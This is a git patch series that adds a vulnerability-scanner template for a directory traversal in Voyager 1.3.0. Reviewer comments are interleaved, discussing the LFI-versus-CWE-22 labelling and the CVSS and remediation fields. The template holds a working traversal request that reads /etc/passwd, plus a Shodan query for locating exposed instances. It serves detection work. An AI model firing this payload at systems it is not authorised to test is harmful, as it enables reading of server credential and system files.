From 380c0e3911cc73784a131e8fa7c9819df8aeff4a Mon Sep 17 00:00:00 2001
From: memmedrehimzade <36675105+memmedrehimzade@users.noreply.github.com>
Date: Sun, 31 Mar 2024 15:14:49 +0400
Subject: [PATCH 1/2] Create voyager-path-traversal.yaml
---
 .../other/voyager-path-traversal.yaml | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 http/vulnerabilities/other/voyager-path-traversal.yaml
diff --git a/http/vulnerabilities/other/voyager-path-traversal.yaml b/http/vulnerabilities/other/voyager-path-traversal.yaml
new file mode 100644
index 0000000000..8be474a7d3
--- /dev/null
+++ b/http/vulnerabilities/other/voyager-path-traversal.yaml
@@ -0,0 +1,33 @@
+id: voyager-path-traversal
+
+info:
+ name: voyager_directory_traversal
+ author: mammad_rahimzada
+ severity: high
+ description: voyager 1.3.0 is vulnerable to local file inclusion.
+ reference:
+ https://www.exploit-db.com/exploits/47875
+ classification:
+ cvss-score: 7.5
+ cwe-id: CWE-22
+ tags: voyager , lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+ condition: or
+
+ - type: status
+ status:
+ - 200
+
From 869bf27a3745a648df11c7fce2c43a80740d8a2b Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Sun, 31 Mar 2024 23:11:43 +0530
Subject: [PATCH 2/2] Update and rename voyager-path-traversal.yaml to voyager-lfi.yaml
---
 ...r-path-traversal.yaml => voyager-lfi.yaml} | 28 +++++++++++--------
 1 file changed, 17 insertions(+), 11 deletions(-)
 rename http/vulnerabilities/other/{voyager-path-traversal.yaml => voyager-lfi.yaml} (57%)
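Review bot: The `description` line calls this local file inclusion, but `cwe-id: CWE-22` and the request itself (a traversal sequence in the `path` parameter of `/admin/voyager-assets` ending in `etc/passwd`) describe a path traversal that reads a file; nothing in the template shows a file being included or executed. The follow-up patch keeps the same sentence and renames the id to `voyager-lfi` while titling the template "Directory Traversal", so the labels disagree there too. I would word it as `description: Voyager 1.3.0 is vulnerable to directory traversal via the path parameter of /admin/voyager-assets, which allows reading files such as /etc/passwd from the server.` so that triage and CWE-based filtering point at the same weakness class.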
diff --git a/http/vulnerabilities/other/voyager-path-traversal.yaml b/http/vulnerabilities/other/voyager-lfi.yaml similarity index 57% rename from http/vulnerabilities/other/voyager-path-traversal.yaml rename to http/vulnerabilities/other/voyager-lfi.yaml index 8be474a7d3..a5cf9d6ae1 100644 --- a/http/vulnerabilities/other/voyager-path-traversal.yaml +++ b/http/vulnerabilities/other/voyager-lfi.yaml @@ -1,33 +1,39 @@ -id: voyager-path-traversal +id: voyager-lfi info: - name: voyager_directory_traversal + name: Voyager 1.3.0 - Directory Traversal author: mammad_rahimzada severity: high - description: voyager 1.3.0 is vulnerable to local file inclusion. + description: | + Voyager 1.3.0 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/47875 + - https://www.exploit-db.com/exploits/47875 classification: cvss-score: 7.5 cwe-id: CWE-22 - tags: voyager , lfi + metadata: + verified: true + max-request: 1 + shodan-query: html:"voyager-assets" + tags: voyager,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd" - stop-at-first-match: true matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - condition: or + + - type: word + part: header + words: + - "text/plain" - type: status status: - 200 -
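Review bot: The `classification` block carries `cvss-score: 7.5` without a vector, and `info` has no `remediation`, so a hit gives the operator a severity but neither the assumptions behind it nor what to do next. If the read needs no authentication, as the credential-less GET and `verified: true` suggest, I would add `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` under `classification`, which is the vector that yields 7.5. I would also add a `remediation:` line such as `Upgrade Voyager to <FIXED_VERSION> and restrict access to /admin/voyager-assets.`, with the version taken from the vendor's fix, since the page does not name one.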